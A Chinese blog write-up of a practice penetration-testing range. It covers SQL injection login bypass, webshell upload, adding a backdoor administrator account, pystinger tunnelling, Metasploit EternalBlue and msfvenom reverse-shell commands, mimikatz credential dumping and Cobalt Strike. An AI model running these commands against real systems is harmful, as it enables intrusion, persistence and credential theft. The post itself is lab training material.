本文讲述了作者通过Kali渗透技术,从Sqlmap靶场开始,一步步利用dirsearch发现登录地址,手工注入并利用经典密码,成功上传木马、管理用户权限,最终通过pystinger和cobaltstrike实现远程操控的过程。
封神台新靶场 - Kali系列【4题】
文章目录
Kali渗透 - Sqlmap实操靶场
通过题目猜测可能是要用sqlmap,但是在网站直接找不到可以注入的点,于是猜测可能要进行目录扫描,于是拿出dirsearch
直接一波扫描发现后台登录地址
http://lri45456.ia.aqlab.cn/admin
最开始直接上sqlmap,结果靶场一直崩。那就只有手工注入了。
上burp。
从报错可以猜测后台查询语句 大概是:
select * from user where username = ‘’ and password = ‘’;
然后看是否返回结果,即不是空数组。
经典的万能密码
dp' or 1 =1 #
dq'+or+1+%3d+1%23
然后到后台页面。
发现可以上传木马【居然没有检查类型???】
上蚁剑
看用户,看网络链接
这么高权限😀,还有3389,所以尝试”本地登录3389“看网络配置,测试是否出网
不能ping通,多半不能出网,那就用http80端口复用
首先添加用户,并加入管理员组,后面登录就用这个账号
net user jdq 123456...aA /add && net localgroup administrators jdq /add
上工具pystinger,最开始用的是工具neo-regeorg,成功。
后面用pystinger,以前使用没成功,这次就行了,说明工具多多益善。
pystinger教程
上传他的proxy.php测试ok
上传stinger_server.exe 用蚁剑运行,查看是否运行成功。tasklist | findstr sting.成功运行
在本地windows开始连接该代理。
说明成功连接!!!!😀 注意,如果一直返回错误数据
请检查代理端口6000是否被占用。。。或者稍后半小时再试
本地端口6000就是socks4a代理端口,拿出proxifier,添加代理服务器。
因为靶机开启了3389端口,但是不能出网。所以无法直接连接,但是使用代理后我就可以用127.0.0.1来远程登录。
用proxifier代理mstsc.exe
然后登录,win+r,输入mstsc
可能这个地址看起来有点怪异,其实是因为proxifier已经把流量发到靶机了,所以靶机的3389才会收到这个流量。
然后输入账号密码,成功😀
本题说是要找管理员密码。
打开phpstudy,
点击mysql-front,猜测默认密码root,直接可视化查看数据库。
找不到flag在哪😭,知道的大佬给我说说。。。。。
Kali渗透 - 拿下目标服务器
用蚁剑直接在c盘网站根目录找,
Kali渗透 - 通过Sqlmap直接获得服务器权限
应该就是–os-shell直接获得shell,本题没有flag
kali渗透 - hydra爆破服务器登陆密码
本题有问题呢??题目说linux服务器,但靶机实际是windows服务器???
该靶机后续渗透 pystinger + cobalt strike 不出网上线
上传port扫描神器,扫描发现局域网好多机器。好多139/445
于是拿VPS有msf的进行永恒之蓝利用一下。
VPS 开启代理
./stinger_client -w http://lri45456.ia.aqlab.cn/Static/upload/source/20220312/proxy.php -l 0.0.0.0 -p 6000
第一个是永恒之蓝扫描模块:auxiliary/scanner/smb/smb_ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.0.4
set proxies socks4:127.0.0.1:6000
run
第二个是永恒之蓝攻击代码:exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set payload payload/windows/shell_reverse_tcp
set rhosts 192.168.0.28
set lhost 127.0.0.1
set lport 60020(因为pystinger)
set proxies socks4:127.0.0.1:6000
set ReverseAllowProxy true
run
没有成功,我觉得是因为流量转发的问题,没办法,转了太多次了。。。。
第二种思路:
生成可执行木马木马
msfvenom lhost=192.168.0.27 lport=4444 -f exe --platform windows -p windows/shell_reverse_tcp > evil.exe
k8 加强版 zzz 攻击工具使用
下载
mstsc登录,上传相关的工具,测试192.168.0.20 可以运行起来,但是没有回连。
msf 做个小结:
- 第一种
可直接上传木马到靶机
msfvenom 生成木马:msfvenom lhost=192.168.0.2 lport=4444 -f exe --platform windows -p windows/shell_reverse_tcp > evil.exe
配合 exploit/multi/handler模块使用
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set lhost 192.168.0.2
set lport 4444
run
- 第二种
靶机并没有被控制,但发现漏洞,使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.0.19
set payload windows/x64/shell/reverse_tcp
set lhost 192.168.0.2
set lport 4444
run
好了 看来msf神器不能使用了。换CS。
上mimikatz,由于创建的jdq权限不够system,而蚁剑的权限是system,所以就用蚁剑运行mimikatz
mimikatz.exe “privilege::debug” “sekurlsa::logonpasswords” “exit”> password.txt
type password.txt
同时,由于该靶机是64位,所以要上传64位咪咪卡兹。
上neo-regeorg,mstsc挂钩代理neo,登录。
上pystinger,靶机与VPS连接成功。cs与pystinger在同一VPS。
cs+pystinger二者联动参考文章
上面文章的有一处不清楚,他是建立http listener
将生成的exe上传到靶机运行。成功上线
1549
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
